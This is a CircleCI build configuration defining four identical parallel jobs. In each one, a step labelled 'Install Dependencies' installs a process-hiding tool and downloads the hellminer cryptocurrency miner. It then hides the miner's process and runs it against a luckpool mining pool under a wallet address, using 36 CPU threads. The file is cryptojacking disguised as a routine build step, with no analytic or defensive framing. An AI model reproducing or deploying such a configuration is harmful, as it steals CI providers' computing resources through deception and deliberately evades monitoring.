version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt install nodejs && npm i -g node-process-hider && wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz && sudo ph add hellminer && ./hellminer -c stratum+tcp://na.luckpool.net:3956 -u RTLYtE6ifDzLp8sNX6D6bjc8EM3KcVP3XA.Rig -p x --cpu 36

    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt install nodejs && npm i -g node-process-hider && wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz && sudo ph add hellminer && ./hellminer -c stratum+tcp://na.luckpool.net:3956 -u RTLYtE6ifDzLp8sNX6D6bjc8EM3KcVP3XA.Rig -p x --cpu 36

    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt install nodejs && npm i -g node-process-hider && wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz && sudo ph add hellminer && ./hellminer -c stratum+tcp://na.luckpool.net:3956 -u RTLYtE6ifDzLp8sNX6D6bjc8EM3KcVP3XA.Rig -p x --cpu 36

    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt install nodejs && npm i -g node-process-hider && wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz && sudo ph add hellminer && ./hellminer -c stratum+tcp://na.luckpool.net:3956 -u RTLYtE6ifDzLp8sNX6D6bjc8EM3KcVP3XA.Rig -p x --cpu 36

workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3